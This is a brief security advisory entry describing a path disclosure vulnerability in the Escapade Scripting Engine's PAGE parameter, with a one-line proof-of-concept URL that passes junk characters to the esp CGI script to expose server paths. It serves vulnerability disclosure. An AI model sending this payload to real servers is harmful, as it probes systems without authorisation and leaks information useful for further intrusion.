• info
• discussion
• exploit
• solution
• references

Escapade Scripting Engine PAGE Parameter Path Disclosure Vulnerability

The following proof of concept has been supplied:

http://www.site.com/cgi-bin/esp?PAGE=!@#$%